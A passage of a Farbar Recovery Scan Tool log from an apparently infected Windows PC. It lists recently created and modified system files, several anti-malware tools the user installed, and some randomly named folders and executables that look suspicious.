_____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll 2014-11-30 23:19 - 2013-12-04 16:43 - 00583680 _____ (Microsoft Corporation) C:\Windows\system32\msdrm.dll 2014-11-30 23:19 - 2013-12-04 16:37 - 00451072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdrm.dll 2014-11-30 23:19 - 2013-03-02 01:23 - 00375808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReAgent.dll 2014-11-30 23:19 - 2013-03-01 19:44 - 01011200 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll 2014-11-30 23:19 - 2012-12-14 21:55 - 00443392 _____ (Microsoft Corporation) C:\Windows\system32\ReAgent.dll 2014-11-30 23:18 - 2013-11-22 23:43 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll 2014-11-30 23:18 - 2013-11-22 22:05 - 00368640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPhoto.dll 2014-11-30 23:18 - 2013-08-23 00:22 - 02062848 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll 2014-11-30 23:18 - 2013-08-22 18:44 - 01711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll 2014-11-30 23:18 - 2013-03-21 20:49 - 02382336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll 2014-11-30 23:18 - 2013-03-21 15:47 - 02851840 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll 2014-11-30 23:17 - 2014-01-30 17:48 - 01339392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll 2014-11-30 23:17 - 2014-01-30 17:06 - 01628160 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll 2014-11-30 23:17 - 2013-10-31 22:38 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll 2014-11-30 23:17 - 2013-10-31 20:49 - 00273408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msieftp.dll 2014-11-30 23:17 - 2013-04-02 16:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptdlg.dll 2014-11-30 23:17 - 2013-04-02 16:12 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\cryptdlg.dll 2014-11-30 23:17 - 2012-12-12 21:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll 2014-11-30 23:17 - 2012-12-12 20:59 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll 2014-11-30 23:06 - 2014-10-30 04:25 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-11-30 21:55 - 2014-11-30 21:55 - 00002362 _____ () C:\Windows\system32\.crusader 2014-11-30 21:38 - 2014-11-30 21:55 - 00000000 ____D () C:\ProgramData\HitmanPro 2014-11-30 21:38 - 2014-11-30 21:38 - 00001893 _____ () C:\Users\Public\Desktop\HitmanPro.lnk 2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro 2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\Program Files\HitmanPro 2014-11-30 21:35 - 2014-10-31 23:26 - 103374192 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2014-11-30 21:30 - 2014-11-30 21:35 - 32507072 _____ (Microsoft Corporation) C:\Users\johnsmith\Downloads\Windows-KB890830-x64-V5.18.exe 2014-11-30 21:28 - 2014-11-30 21:36 - 11222744 _____ (SurfRight B.V.) C:\Users\johnsmith\Downloads\HitmanPro_x64.exe 2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\Users\johnsmith\Desktop\removal tools 2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\FRST 2014-11-30 20:48 - 2014-11-30 20:48 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\johnsmith\Downloads\tdsskiller.exe 2014-11-30 20:34 - 2014-11-30 20:34 - 00000117 _____ () C:\Windows\system32\netcfg-26750.txt 2014-11-30 20:33 - 2014-11-30 20:33 - 00000117 _____ () C:\Windows\system32\netcfg-2834125.txt 2014-11-30 20:23 - 2014-11-30 20:29 - 00000000 ____D () C:\Users\johnsmith\Desktop\ReportMaker 2014-11-30 20:09 - 2014-11-30 20:10 - 06360161 _____ () C:\Users\johnsmith\Downloads\ReportMaker.1417400617.exe 2014-11-30 20:01 - 2014-12-01 09:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-11-30 20:00 - 2014-12-01 07:57 - 00096472 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-11-30 20:00 - 2014-11-30 20:00 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-11-30 20:00 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-11-30 20:00 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-11-30 19:52 - 2014-11-30 19:52 - 00000117 _____ () C:\Windows\system32\netcfg-357703.txt 2014-11-30 19:47 - 2014-11-30 19:47 - 00000117 _____ () C:\Windows\system32\netcfg-96156.txt 2014-11-30 19:46 - 2014-12-01 09:28 - 00005748 _____ () C:\Windows\PFRO.log 2014-11-30 19:43 - 2014-11-30 19:43 - 00000167 _____ () C:\Windows\system32\netcfg-116564500.txt 2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116559484.txt 2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116556640.txt 2014-11-30 19:33 - 2014-11-30 21:40 - 202839360 _____ (Kaspersky Lab) C:\Users\johnsmith\Downloads\kis15.0.1.415EN_6874.exe 2014-11-30 10:16 - 2014-12-01 06:21 - 00961086 _____ () C:\Windows\WindowsUpdate.log 2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3028671.txt 2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3022500.txt 2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219796.txt 2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219750.txt 2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350140.txt 2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350078.txt 2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40248046.txt 2014-11-27 11:59 - 2014-11-27 11:59 - 00000117 _____ () C:\Windows\system32\netcfg-40247437.txt 2014-11-27 00:48 - 2014-11-27 00:48 - 00000117 _____ () C:\Windows\system32\netcfg-80960203.txt 2014-11-26 18:07 - 2014-11-27 00:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Iravbypa 2014-11-26 18:03 - 2014-11-30 20:33 - 00000000 ____D () C:\ProgramData\NicwEsray 2014-11-26 02:23 - 2014-11-26 02:23 - 00000117 _____ () C:\Windows\system32\netcfg-276359.txt 2014-11-26 02:18 - 2014-11-26 02:18 - 00000117 _____ () C:\Windows\system32\netcfg-57643953.txt 2014-11-26 00:23 - 2014-11-26 00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768500.txt 2014-11-26 00:23 - 2014-11-26 00:23 - 00000117 _____ () C:\Windows\system32\netcfg-50768421.txt 2014-11-25 18:46 - 2014-11-26 02:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\FrameworkUpdate 2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231437.txt 2014-11-25 16:44 - 2014-11-25 16:44 - 00000117 _____ () C:\Windows\system32\netcfg-23231328.txt 2014-11-25 15:56 - 2014-11-25 15:56 - 00001475 _____ () C:\Users\johnsmith\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google.lnk 2014-11-25 10:54 - 2014-11-25 10:54 - 00000117 _____ () C:\Windows\system32\netcfg-2195375.txt 2014-11-25 10:19 - 2014-11-25 10:19 - 00000117 _____ () C:\Windows\system32\netcfg-125890.txt 2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928343.txt 2014-11-23 17:33 - 2014-11-23 17:33 - 00000117 _____ () C:\Windows\system32\netcfg-109928281.txt 2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871812.txt 2014-11-23 17:32 - 2014-11-23 17:32 - 00000117 _____ () C:\Windows\system32\netcfg-109871734.txt 2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657734.txt 2014-11-23 15:32 - 2014-11-23 15:32 - 00000117 _____ () C:\Windows\system32\netcfg-102657562.txt 2014-11-22 17:17 - 2014-11-22 17:17 - 00000117 _____ () C:\Windows\system32\netcfg-22575437.txt 2014-11-22 11:03 - 2014-11-22 11:03 - 00000117 _____ () C:\Windows\system32\netcfg-137015.txt 2014-11-20 09:44 - 2014-11-20 09:44 - 00000117 _____ () C:\Windows\system32\netcfg-53047234.txt 2014-11-20 07:40 - 2014-11-20 07:40 - 00000117 _____ () C:\Windows\system32\netcfg-45565703.txt 2014-11-20 01:14 - 2014-11-08 04:22 - 00238080 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll 2014-11-20 01:14 - 2014-11-08 04:21 - 00827904 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-11-20 01:14 - 2014-11-07 23:57 - 00187904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll 2014-11-20 01:14 - 2014-11-07 23:56 - 00666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2014-11-20 01:14 - 2014-10-11 01:35 - 00171840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2014-11-20 01:14 - 2014-10-11 00:44 - 00588288 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll 2014-11-20 01:14 - 2014-10-11 00:43 - 01281536 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-11-20 01:14 - 2014-10-10 22:57 - 00452608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll 2014-11-20 01:14 - 2014-05-29 16:02 - 00439808 _____ (Microsoft Corporation) C:\Windows\system32\lsm.dll 2014-11-20 01:14 - 2014-04-12 02:10 - 00578048 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2014-11-20 01:14 - 2014-04-12 02:09 - 01043968 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll 2014-11-20 01:14 - 2014-04-12 02:09 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2014-11-20 01:14 - 2014-04-12 02:09 - 00094720 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2014-11-20 01:14 - 2014-04-12 02:08 - 00318464 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2014-11-20 01:14 - 2014-04-12 02:07 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2014-11-20 01:14 - 2014-04-12 00:23 - 00961536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll 2014-11-20 01:14 - 2014-04-12 00:23 - 00273920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2014-11-20 01:14 - 2014-04-12 00:23 - 00178688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2014-11-20 01:14 - 2014-04-12 00:23 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2014-11-20 01:14 - 2014-04-12 00:22 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2014-11-20 01:14 - 2014-04-11 23:58 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\workerdd.dll 2014-11-20 01:14 - 2014-03-03 16:07 - 00570216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys 2014-11-19 20:57 - 2014-11-19 20:57 - 00000117 _____ () C:\Windows\system32\netcfg-7000390.txt 2014-11-19 20:52 - 2014-11-19 20:52 - 00000117 _____ () C:\Windows\system32\netcfg-6735375.txt 2014-11-19 19:26 - 2014-11-19 19:26 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys 2014-11-19 19:26 - 2014-11-19 19:26 - 00000000 ____D () C:\ProgramData\RogueKiller 2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14821203.txt 2014-11-19 13:25 - 2014-11-19 13:25 - 00000117 _____ () C:\Windows\system32\netcfg-14820968.txt 2014-11-18 07:57 - 2014-11-18 07:57 - 00000117 _____ () C:\Windows\system32\netcfg-57518609.txt 2014-11-18 07:56 - 2014-11-18 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-57439656.txt 2014-11-14 19:39 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S03 2014-11-14 19:36 - 2014-11-17 15:26 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S01 2014-11-14 19:34 - 2014-11-17 10:35 - 00000000 ____D () C:\Users\johnsmith\Downloads\walking-dead-S02 2014-11-14 16:06 - 2014-11-14 16:06 - 00000325 _____ () C:\Users\johnsmith\Desktop\Employee Calendar.url 2014-11-14 13:07 - 2014-11-14 13:07 - 00000117 _____ () C:\Windows\system32\netcfg-696923281.txt 2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595764046.txt 2014-11-13 09:01 - 2014-11-13 09:01 - 00000117 _____ () C:\Windows\system32\netcfg-595763968.txt 2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509518703.txt 2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509518593.txt 2014-11-12 09:04 - 2014-11-12 09:04 - 00000117 _____ () C:\Windows\system32\netcfg-509512187.txt 2014-11-12 09:00 - 2014-11-12 09:00 - 00000117 _____ () C:\Windows\system32\netcfg-509313421.txt 2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509068250.txt 2014-11-12 08:56 - 2014-11-12 08:56 - 00000117 _____ () C:\Windows\system32\netcfg-509062265.txt 2014-11-12 02:48 - 2014-09-24 16:29 - 00318976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2014-11-12 02:48 - 2014-09-24 16:29 - 00072192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll 2014-11-12 02:48 - 2014-09-24 16:01 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-11-12 02:48 - 2014-09-24 16:01 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll 2014-11-12 02:48 - 2014-08-21 16:56 - 01418752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll 2014-11-12 02:48 - 2014-08-21 16:27 - 01845760 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2014-11-12 02:48 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe 2014-11-12 02:48 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\tssdisai.dll 2014-11-12 02:47 - 2014-10-23 05:47 - 00079872 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-11-12 02:47 - 2014-10-23 04:04 - 00068096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll 2014-11-12 02:47 - 2014-10-18 01:44 - 00778240 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2014-11-12 02:47 - 2014-10-18 00:05 - 00567808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll 2014-11-12 02:47 - 2014-10-11 00:44 - 03248640 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll 2014-11-12 02:47 - 2014-10-10 22:41 - 00713728 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2014-11-12 02:47 - 2014-10-10 22:41 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2014-11-12 02:47 - 2014-10-10 22:05 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2014-11-12 02:47 - 2014-10-10 22:04 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2014-11-12 02:47 - 2014-10-02 18:21 - 00522728 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2014-11-12 02:47 - 2014-10-02 15:29 - 00783872 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2014-11-12 02:47 - 2014-10-02 15:29 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2014-11-12 02:47 - 2014-10-02 15:29 - 00169472 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll 2014-11-12 02:47 - 2014-10-01 16:05 - 04068864 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-11-12 02:47 - 2014-09-12 23:24 - 02233152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys 2014-11-12 02:47 - 2014-05-02 20:34 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll 2014-11-12 02:47 - 2012-10-12 01:08 - 00027880 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys 2014-11-12 02:47 - 2012-10-11 23:14 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\rfxvmt.dll 2014-11-12 02:46 - 2014-10-25 18:56 - 02237952 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-11-12 02:46 - 2014-10-25 18:56 - 01409536 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-11-12 02:46 - 2014-10-25 18:56 - 00915968 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll 2014-11-12 02:46 - 2014-10-25 18:56 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\UXInit.dll 2014-11-12 02:46 - 2014-10-25 18:56 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2014-11-12 02:46 - 2014-10-25 18:55 - 19284480 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-11-12 02:46 - 2014-10-25 18:55 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-11-12 02:46 - 2014-10-25 18:55 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-11-12 02:46 - 2014-10-25 18:54 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-11-12 02:46 - 2014-10-25 18:54 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-11-12 02:46 - 2014-10-25 18:54 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-11-12 02:46 - 2014-10-25 18:54 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-11-12 02:46 - 2014-10-25 18:54 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-11-12 02:46 - 2014-10-25 18:54 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2014-11-12 02:46 - 2014-10-25 18:54 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll 2014-11-12 02:46 - 2014-10-25 18:53 - 01509376 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-11-12 02:46 - 2014-10-25 17:36 - 01762816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2014-11-12 02:46 - 2014-10-25 17:35 - 01181696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2014-11-12 02:46 - 2014-10-25 17:35 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2014-11-12 02:46 - 2014-10-25 17:35 - 00044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UXInit.dll 2014-11-12 02:46 - 2014-10-25 17:34 - 13758464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2014-11-12 02:46 - 2014-10-25 17:34 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2014-11-12 02:46 - 2014-10-25 17:34 - 01441280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2014-11-12 02:46 - 2014-10-25 17:34 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2014-11-12 02:46 - 2014-10-25 17:34 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2014-11-12 02:46 - 2014-10-25 17:34 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll 2014-11-12 02:46 - 2014-10-25 17:34 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2014-11-12 02:46 - 2014-10-25 17:19 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-11-12 02:46 - 2014-10-25 17:13 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2014-11-12 02:46 - 2014-10-25 14:48 - 00534528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uxtheme.dll 2014-11-12 02:46 - 2014-09-21 22:53 - 00035320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdBoot.sys 2014-11-12 02:46 - 2014-09-05 17:46 - 00389176 _____ () C:\Windows\system32\ApnDatabase.xml 2014-11-12 02:46 - 2014-09-02 19:48 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll 2014-11-12 02:46 - 2014-09-02 19:22 - 00188928 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll 2014-11-12 02:46 - 2014-08-28 21:17 - 02043392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll 2014-11-12 02:46 - 2014-08-28 21:17 - 00227328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll 2014-11-12 02:46 - 2014-08-28 21:04 - 02837504 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll 2014-11-12 02:46 - 2014-08-28 21:04 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll 2014-11-12 02:46 - 2014-08-27 23:04 - 00499712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSCOMEX.dll 2014-11-12 02:46 - 2014-08-27 23:04 - 00227840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSAPI.dll 2014-11-12 02:46 - 2014-08-27 22:59 - 00616448 _____ (Microsoft Corporation) C:\Windows\system32\FXSAPI.dll 2014-11-12 02:46 - 2014-08-27 22:59 - 00609280 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOMEX.dll 2014-11-12 02:46 - 2014-08-27 22:59 - 00432640 _____ (Microsoft Corporation) C:\Windows\system32\FXSTIFF.dll 2014-11-12 02:46 - 2014-08-27 22:59 - 00254976 _____ (Microsoft Corporation) C:\Windows\system32\FXST30.dll 2014-11-12 02:46 - 2014-08-26 15:08 - 00270024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdFilter.sys 2014-11-12 02:46 - 2014-07-24 06:12 - 00328512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys 2014-11-12 02:45 - 2014-10-25 18:55 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2014-11-12 02:45 - 2014-10-25 18:54 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-11-12 02:45 - 2014-10-25 18:54 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2014-11-12 02:45 - 2014-10-25 18:54 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-11-12 02:45 - 2014-10-25 18:54 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2014-11-12 02:45 - 2014-10-25 17:35 - 14368768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2014-11-12 02:45 - 2014-10-25 17:35 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2014-11-12 02:45 - 2014-10-25 17:35 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2014-11-12 02:45 - 2014-10-25 17:34 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2014-11-12 02:45 - 2014-10-25 17:34 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2014-11-12 02:45 - 2014-10-25 17:34 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2014-11-12 02:45 - 2014-10-25 17:34 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340312.txt 2014-11-10 11:28 - 2014-11-10 11:28 - 00000117 _____ () C:\Windows\system32\netcfg-345340234.txt 2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333130109.txt 2014-11-10 08:04 - 2014-11-10 08:04 - 00000117 _____ () C:\Windows\system32\netcfg-333127046.txt 2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216665062.txt 2014-11-08 23:43 - 2014-11-08 23:43 - 00000117 _____ () C:\Windows\system32\netcfg-216664734.txt 2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206372718.txt 2014-11-08 20:51 - 2014-11-08 20:51 - 00000117 _____ () C:\Windows\system32\netcfg-206371781.txt 2014-11-08 18:54 - 2014-11-09 23:10 - 00000000 ____D () C:\Users\johnsmith\Downloads\bosch.s01e01.pilot.720p.webrip.x264-w4f-sample.mkv 2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78900203.txt 2014-11-07 09:27 - 2014-11-07 09:27 - 00000117 _____ () C:\Windows\system32\netcfg-78898078.txt 2014-11-07 01:42 - 2014-11-14 11:23 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree (1) 2014-11-07 01:34 - 2014-11-07 01:37 - 00000000 ____D () C:\Users\johnsmith\Downloads\polyphonic spree 2014-11-06 11:31 - 2014-11-06 11:31 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\6A815FEA01B.exe 2014-11-06 11:26 - 2014-11-06 11:26 - 00002560 _____ () C:\Users\johnsmith\AppData\Local\EB79B990EB2A.exe ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-01 09:38 - 2012-07-25 22:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM 2014-12-01 09:36 - 2012-07-26 01:12 - 00000000 ___HD () C:\Windows\ELAMBKUP 2014-12-01 09:35 - 2014-05-08 13:10 - 00000928 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-12-01 09:35 - 2012-07-26 00:28 - 00941114 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-12-01 09:31 - 2014-05-08 13:10 - 00000924 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-12-01 09:29 - 2012-07-26 00:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-12-01 09:26 - 2012-07-25 22:37 - 00000000 ____D () C:\Windows\servicing 2014-12-01 09:20 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\WinStore 2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ToastData 2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ImmersiveControlPanel 2014-12-01 09:19 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\PolicyDefinitions 2014-12-01 09:19 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\oobe 2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility 2014-12-01 09:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility 2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools 2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools 2014-12-01 09:17 - 2012-07-26 01:12 - 